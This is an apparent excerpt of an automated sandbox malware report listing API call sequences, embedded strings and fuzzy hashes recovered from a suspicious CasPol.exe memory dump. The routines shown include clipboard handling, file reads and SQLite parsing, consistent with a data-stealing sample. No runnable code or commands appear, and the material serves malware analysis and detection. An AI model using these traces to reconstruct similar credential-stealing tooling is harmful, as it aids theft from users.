                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3655998216-0
                                                                                                                                                                                                                    • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1828521557-0
                                                                                                                                                                                                                    • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 609303285-0
                                                                                                                                                                                                                    • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                                    • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2081463915-0
                                                                                                                                                                                                                    • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2136311172-0
                                                                                                                                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1936579350-0
                                                                                                                                                                                                                    • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                                                    • String ID: %$(NULL)$+$-x0$0123456789ABCDEF0123456789abcdef$NULL
                                                                                                                                                                                                                    • API String ID: 643879872-1412151055
                                                                                                                                                                                                                    • Opcode ID: 45f900fed4a06140ae550ccc5a931fa38b22f965e298bcc8240220526294edcc
                                                                                                                                                                                                                    • Instruction ID: e0cc6b836fff892d006744b0329856caed0b51470de7c61c9c8f9526dc712ed7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45f900fed4a06140ae550ccc5a931fa38b22f965e298bcc8240220526294edcc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD32C0319087918FD721CF18D5807EBBBE1AF95304F19495FE8C497252D378CA8ACB9A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3604893535-0
                                                                                                                                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4218492932-0
                                                                                                                                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1213725291-0
                                                                                                                                                                                                                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: 8$P$P$at most %d tables in a join$cannot use index: %s
                                                                                                                                                                                                                    • API String ID: 2221118986-3931078971
                                                                                                                                                                                                                    • Opcode ID: 10b8dfbac9ea5f296623b2e36d2bbafb82830fb2f1b12c01d525242f931228d1
                                                                                                                                                                                                                    • Instruction ID: a4a7f51c7708a2cf2cee828f321a28954037f43b08d1d975c1b10d1e328082e6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b8dfbac9ea5f296623b2e36d2bbafb82830fb2f1b12c01d525242f931228d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27425171D00219DFEF14CF95C881AEEBBB1FF08314F14855AEA15AB251D738A9A1CF98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                    • free.MSVCRT ref: 00418370
                                                                                                                                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                                                                                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • rows inserted, xrefs: 00436C5F
                                                                                                                                                                                                                    • table %S has %d columns but %d values were supplied, xrefs: 0043648A
                                                                                                                                                                                                                    • %d values for %d columns, xrefs: 004364AA
                                                                                                                                                                                                                    • table %S has no column named %s, xrefs: 00436578
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: %d values for %d columns$rows inserted$table %S has %d columns but %d values were supplied$table %S has no column named %s
                                                                                                                                                                                                                    • API String ID: 2221118986-2709362559
                                                                                                                                                                                                                    • Opcode ID: 4c8ab9cd607e8854f9e547d994437d4687ff29f7313e8e17e2a59fb75ba467f6
                                                                                                                                                                                                                    • Instruction ID: 9c125d797f7739dd18a706fcf9805d15b4108fee604c20040dca07a78b4adc45
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c8ab9cd607e8854f9e547d994437d4687ff29f7313e8e17e2a59fb75ba467f6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27929071E0021AFFDF10DF95C881BAEBBB1EF08314F15905AE905A7281D739AE51CB99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: no such column: %s$rows updated
                                                                                                                                                                                                                    • API String ID: 2221118986-885832449
                                                                                                                                                                                                                    • Opcode ID: f7ae896b199c8f3835dbc7747b670471d9df52f336ae7a6ba2c658ca5c2830cb
                                                                                                                                                                                                                    • Instruction ID: 7dcecc785416030557bf3e65fdb184edeeac1647f375ce5d724b37e86bd915e6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7ae896b199c8f3835dbc7747b670471d9df52f336ae7a6ba2c658ca5c2830cb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB728871608301AFDB10DF19C881A1BBBE1FF88718F04581EF995A7292D739E951CF96
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
